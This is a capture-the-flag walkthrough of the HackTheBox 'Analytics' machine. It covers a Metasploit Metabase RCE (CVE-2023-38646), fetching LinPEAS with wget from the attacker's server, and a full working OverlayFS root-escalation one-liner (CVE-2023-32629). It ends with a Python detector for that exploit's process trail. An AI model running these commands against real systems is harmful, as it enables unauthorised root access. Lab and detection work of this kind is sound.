HTB Analytics. Escalating privileges with CVE-2023-32629
Greetings, kulhatzkers. Today's write-up is dedicated to hacking Analytics, a Linux machine from HackTheBox.
Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.
Scanning and reconnaissance
As always, we start with scanning to identify active services.
nmap -sC -sV -Pn -p- -T4 10.10.11.234
Getting primary access using Metasploit
Based on the scan results, you can see that a web service is listening on port 80. Let's try to open the web page:
This is Metabase. After searching the Internet, we find an exploit for it. The vulnerability has the ID CVE-2023-38646 and leads to remote code execution. Just what you need to get initial access. The exploit can be found on GitHub and in Metasploit. Personally, I'll run the exploit in Metasploit:
use exploit/linux/http/metabase_setup_token_rce
To advance further, we need to transfer LinPEAS to the machine to discover ways to escalate privileges. To do that, we start python3 http.server on our own OS and download the script we need through wget:
python3 -m http.server 80
wget http://10.10.16.68/linpeas.sh
Let’s launch LinPEAS:
bash ./linpeas.sh
When it finishes, the script finds the credentials for connecting via SSH:
Let's connect to the machine using ssh:
ssh metalytics@10.10.11.233
The flag is located here: user.txt
Privilege escalation
In the same way, let's start python3 http.server, transfer LinPEAS over wget and run it on the machine:
Once the script finishes, we determine the version of Ubuntu and find a privilege escalation vulnerability for it. Alternatively, you can determine the OS version using cat /etc/os-release. The privilege escalation vulnerability is due to discrepancies in the implementation of the OverlayFS module in the Linux kernel. OverlayFS is a union mount file system implementation that has been targeted by attackers because unprivileged users can reach it through user namespaces and because of the presence of easily exploitable bugs. Let's copy the payload from the exploit and run it to escalate privileges:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
The machine is completed!
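From the defender's side, the one-liner above leaves a recognizable trail in process telemetry: an unprivileged unshare that creates user and mount namespaces, an overlay mount and a setcap inside them, and a setuid file created under /var/tmp. The detector below is an added example, not code from the original write-up or from any exploit project; the event format, indicator names, regex heuristics and severity levels are assumptions of this example.

```python
import re

SAMPLE_EVENTS = [  # constructed (uid, command line) events, not from a real host
    (1000, 'unshare -rm sh -c "mkdir l u w m && setcap cap_setuid+eip l/python3;'
           'mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m"'),
    (1000, 'unshare --map-root-user --mount sh -c "mount -t tmpfs none /mnt"'),
    (0, 'mount -t overlay overlay -o lowerdir=/a,upperdir=/b,workdir=/c /merged'),
    (1000, 'chmod 4755 /var/tmp/bash'),
]

OVERLAY_MOUNT = re.compile(r'\bmount\b[^;&|]*-t\s+overlay\b')  # heuristics are assumptions
SETCAP = re.compile(r'\bsetcap\b[^;&|]*\bcap_\w+')
SUID_IN_TMP = re.compile(r'\bchmod\s+(?:[4-7][0-7]{3}|[ugoa]*\+\w*s\w*)\s+/(?:var/)?tmp/')

def unshare_namespaces(cmdline):
    """Return which of {'user', 'mount'} an unshare invocation asks for."""
    toks = cmdline.split()  # options precede the program, so no quote handling is needed
    found = set()
    if not toks or toks[0].rsplit('/', 1)[-1] != 'unshare':
        return found
    for tok in toks[1:]:
        if not tok.startswith('-'):
            break  # first non-option token is the program to run
        long_name = tok.split('=', 1)[0] if tok.startswith('--') else None
        if long_name in ('--user', '--map-root-user') or (not long_name and set(tok) & {'r', 'U'}):
            found.add('user')
        if long_name == '--mount' or (not long_name and 'm' in tok):
            found.add('mount')
    return found

def indicators(uid, cmdline):
    """Name the suspicious traits of one event; root's own activity is out of scope."""
    if uid == 0:
        return []
    in_ns = unshare_namespaces(cmdline) >= {'user', 'mount'}
    checks = [('overlay-mount-in-userns', in_ns and OVERLAY_MOUNT.search(cmdline)),
              ('setcap-in-userns', in_ns and SETCAP.search(cmdline)),
              ('setuid-file-in-tmp', SUID_IN_TMP.search(cmdline))]
    return [name for name, hit in checks if hit]

def alerts(events):
    """High: overlay mount plus setcap in new namespaces. Medium: setuid file in a temp dir."""
    out = []
    for uid, cmd in events:
        hits = indicators(uid, cmd)
        both = {'overlay-mount-in-userns', 'setcap-in-userns'} <= set(hits)
        if both or 'setuid-file-in-tmp' in hits:
            out.append(('high' if both else 'medium', uid, hits))
    return out

print(*alerts(SAMPLE_EVENTS), sep='\n')
```

The second sample event, a user and mount namespace with an ordinary tmpfs mount, is deliberately not flagged: the high-severity rule requires the overlay mount and the setcap together.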